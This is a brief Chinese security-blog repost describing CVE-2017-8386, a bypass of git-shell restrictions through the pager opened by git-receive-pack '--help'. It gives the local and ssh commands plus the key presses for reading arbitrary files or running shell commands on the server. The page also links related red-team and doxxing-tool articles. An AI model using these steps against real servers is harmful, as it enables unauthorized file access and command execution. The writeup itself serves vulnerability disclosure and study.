Git Shell Bypass

03.6W+0

通过git读文件:

git-receive-pack ‘–help’ #本地

ssh git@remoteserver “git-receive-pack ‘–help'” #远程服务器

打开以后按shift+e,然后输入要读的文件路径

2017051109004b08e7df-b09f-413e-9f52-acaf5ff9ee51.gif

通过git执行命令:

git-receive-pack ‘–help’ #本地

ssh git@remoteserver “git-receive-pack ‘–help'” #远程服务器

输入!后输入要执行的命令:

123.gif

详情:https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/

 

文章出处:Evi1cg’s blog   

原文链接:https://evi1cg.me/archives/CVE_2017_8386.html

 

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
教学频道
# Shell
喜欢就支持一下吧
点赞0 分享
AlexFrankly的头像-华盟网
教你怎么玩电报(Telegram)-华盟网
教你怎么玩电报(Telegram)
教你怎么玩电报(Telegram)
8年前 64.2W+
战斗的民族:过去8年被绳之以法的8名俄罗斯黑客-华盟网
战斗的民族:过去8年被绳之以法的8名俄罗斯黑客
战斗的民族:过去8年被绳之以法的8名俄罗斯黑客
9年前 29.1W+
Captcha插件后门分析和修复-华盟网
Captcha插件后门分析和修复
Captcha插件后门分析和修复
9年前 28.2W+
Cobalt Strike神器高级教程利用Aggressor脚本编写目标上线邮件提醒-华盟网
Cobalt Strike神器高级教程利用Aggressor脚本编写目标上线邮件提醒
Cobalt Strike神器高级教程利用Aggressor脚本编写目标上线邮件提醒
8年前 19.5W+
那一年的中国黑客自卫反击战,向英雄致敬!-华盟网
那一年的中国黑客自卫反击战,向英雄致敬!
那一年的中国黑客自卫反击战,向英雄致敬!
7年前 17.3W+
2018国外黑客都在用什么聊天软件?-华盟网
2018国外黑客都在用什么聊天软件?
2018国外黑客都在用什么聊天软件?
8年前 16.3W+
相关推荐
教你怎么玩电报(Telegram)-华盟网
教你怎么玩电报(Telegram)
教你怎么玩电报(Telegram)
8年前 64.2W+
【工具】23个国外社交网络及(人肉)搜索工具-华盟网
【工具】23个国外社交网络及(人肉)搜索工具
【工具】23个国外社交网络及(人肉)搜索工具
8年前 36.9W+
kippo进阶版蜜罐:Cowrie-华盟网
kippo进阶版蜜罐:Cowrie
kippo进阶版蜜罐:Cowrie
6年前 34.4W+
远程桌面登录扫描器:Sticky-Keys-Slayer-华盟网
远程桌面登录扫描器:Sticky-Keys-Slayer
远程桌面登录扫描器:Sticky-Keys-Slayer
6年前 33W+
【工具使用】强大的红队武器Octopus“吊打”杀软-华盟网
【工具使用】强大的红队武器Octopus“吊打”杀软
【工具使用】强大的红队武器Octopus“吊打”杀软
6年前 30W+
Captcha插件后门分析和修复-华盟网
Captcha插件后门分析和修复
Captcha插件后门分析和修复
9年前 28.2W+
评论 抢沙发

请登录后发表评论

    暂无评论内容

test1111

分类